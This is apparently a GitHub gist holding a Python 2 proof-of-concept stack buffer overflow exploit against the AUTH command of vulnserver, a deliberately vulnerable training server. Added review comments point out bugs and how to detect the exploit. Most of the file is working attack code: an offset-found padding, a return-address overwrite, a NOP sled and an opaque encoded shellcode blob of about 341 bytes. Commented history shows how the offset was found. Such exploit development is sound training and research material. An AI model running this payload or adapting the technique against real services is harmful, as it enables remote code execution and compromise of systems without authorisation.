@tresacton
Last active August 29, 2015 14:01
vulnserver_buffer_overflow.py
#!/usr/bin/python
# Proof-of-concept for the "AUTH" command stack buffer overflow in vulnserver,
# a deliberately vulnerable training server. NOTE(review): this is Python 2
# source — the `print` statements and str-as-bytes literals below do not run
# unchanged under Python 3.
import time, struct, sys   # NOTE(review): `time` and `struct` are never used in this script
import socket as so
try:
    # NOTE(review): with the argv read commented out, nothing in this block can
    # raise IndexError, so the usage message in the except branch is
    # unreachable and the target is always the hard-coded lab address below.
    #server = sys.argv[1]
    server = '192.168.11.136'
    port = 5555
except IndexError:
    print "[+] Usage %s host" % sys.argv[0]
    sys.exit()
print "About to attempt connection to %s %s" % (server, port)
# Opaque byte string placed after the 4-byte value that overwrites the saved
# return address (see the buffer line below). What it does when executed
# cannot be determined from this file. By my count it is 341 bytes (24 lines
# of 14 bytes plus a 5-byte tail); the "now 350 bytes" note at the bottom of
# the file may be approximate — confirm.
payload = ("\xb8\xec\x19\x67\xa6\xda\xdd\xd9\x74\x24\xf4\x5b\x29\xc9" +
"\xb1\x4f\x31\x43\x14\x83\xc3\x04\x03\x43\x10\x0e\xec\x9b" +
"\x4e\x47\x0f\x64\x8f\x37\x99\x81\xbe\x65\xfd\xc2\x93\xb9" +
"\x75\x86\x1f\x32\xdb\x33\xab\x36\xf4\x34\x1c\xfc\x22\x7a" +
"\x9d\x31\xeb\xd0\x5d\x50\x97\x2a\xb2\xb2\xa6\xe4\xc7\xb3" +
"\xef\x19\x27\xe1\xb8\x56\x9a\x15\xcc\x2b\x27\x14\x02\x20" +
"\x17\x6e\x27\xf7\xec\xc4\x26\x28\x5c\x53\x60\xd0\xd6\x3b" +
"\x51\xe1\x3b\x58\xad\xa8\x30\xaa\x45\x2b\x91\xe3\xa6\x1d" +
"\xdd\xaf\x98\x91\xd0\xae\xdd\x16\x0b\xc5\x15\x65\xb6\xdd" +
"\xed\x17\x6c\x68\xf0\xb0\xe7\xca\xd0\x41\x2b\x8c\x93\x4e" +
"\x80\xdb\xfc\x52\x17\x08\x77\x6e\x9c\xaf\x58\xe6\xe6\x8b" +
"\x7c\xa2\xbd\xb2\x25\x0e\x13\xcb\x36\xf6\xcc\x69\x3c\x15" +
"\x18\x0b\x1f\x72\xed\x21\xa0\x82\x79\x32\xd3\xb0\x26\xe8" +
"\x7b\xf9\xaf\x36\x7b\xfe\x85\x8e\x13\x01\x26\xee\x3a\xc6" +
"\x72\xbe\x54\xef\xfa\x55\xa5\x10\x2f\xf9\xf5\xbe\x80\xb9" +
"\xa5\x7e\x71\x51\xac\x70\xae\x41\xcf\x5a\xd9\x46\x58\xa5" +
"\x72\x42\x02\x4d\x81\x52\x35\x35\x0c\xb4\x5f\x59\x59\x6f" +
"\xc8\xc0\xc0\xfb\x69\x0c\xdf\x6b\x09\x9f\x84\x6b\x44\xbc" +
"\x12\x3c\x01\x72\x6b\xa8\xbf\x2d\xc5\xce\x3d\xab\x2e\x4a" +
"\x9a\x08\xb0\x53\x6f\x34\x96\x43\xa9\xb5\x92\x37\x65\xe0" +
"\x4c\xe1\xc3\x5a\x3f\x5b\x9a\x31\xe9\x0b\x5b\x7a\x2a\x4d" +
"\x64\x57\xdc\xb1\xd5\x0e\x99\xce\xda\xc6\x2d\xb7\x06\x77" +
"\xd1\x62\x83\x97\x30\xa6\xfe\x3f\xed\x23\x43\x22\x0e\x9e" +
"\x80\x5b\x8d\x2a\x79\x98\x8d\x5f\x7c\xe4\x09\x8c\x0c\x75" +
"\xfc\xb2\xa3\x76\xd5"
)
# Request body layout: 1040 filler bytes (the notes at the bottom record the
# EIP offset as 1040), a 4-byte value that lands on the saved return address
# (written in reverse of the "65 d1 1d 71" note below, i.e. presumably
# little-endian — confirm), eight 0x90 bytes, then the payload.
# NOTE(review): `buffer` shadows a Python 2 builtin of the same name.
# Defender's view: the resulting "AUTH " command is roughly 1.4 KB and mostly
# non-printable — far outside any legitimate use of that command and easy to
# alert on at the protocol level.
buffer = "A" * 1040 + "\x71\x1d\xd1\x65" + "\x90" * 8 + payload
req1 = "AUTH " + buffer
s = so.socket(so.AF_INET, so.SOCK_STREAM)   # plain TCP; no timeout is set on the socket
try:
    s.connect((server, port))
    print repr(s.recv(1024))   # banner read; blocks indefinitely if the server is silent
    s.send(req1)               # NOTE(review): send() may write only part of req1; sendall() would not
    print repr(s.recv(1024))   # blocks forever if the service died without replying
except:
    # NOTE(review): bare except swallows every error (including KeyboardInterrupt)
    # and reports "connection refused" regardless of the real cause.
    print "[!] connection refused, check debugger"
s.close()
# --- History of earlier iterations of this script (kept as written) ---
#req1 = "AUTH " + "\x41"*1072
# buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6B"
# Offset for EIP is at 1040
# buffer = "A" * 1040 + "B" * 4 + "C" * 28
# was
# only 28 bytes
# now 350 bytes
# ---
# 65 d1 1d 71
# 171dd165
# NOTE(review): "65 d1 1d 71" is the 4-byte literal from the buffer line in
# reverse order; the "171dd165" line matches neither order and looks like a
# transcription slip — confirm before relying on it.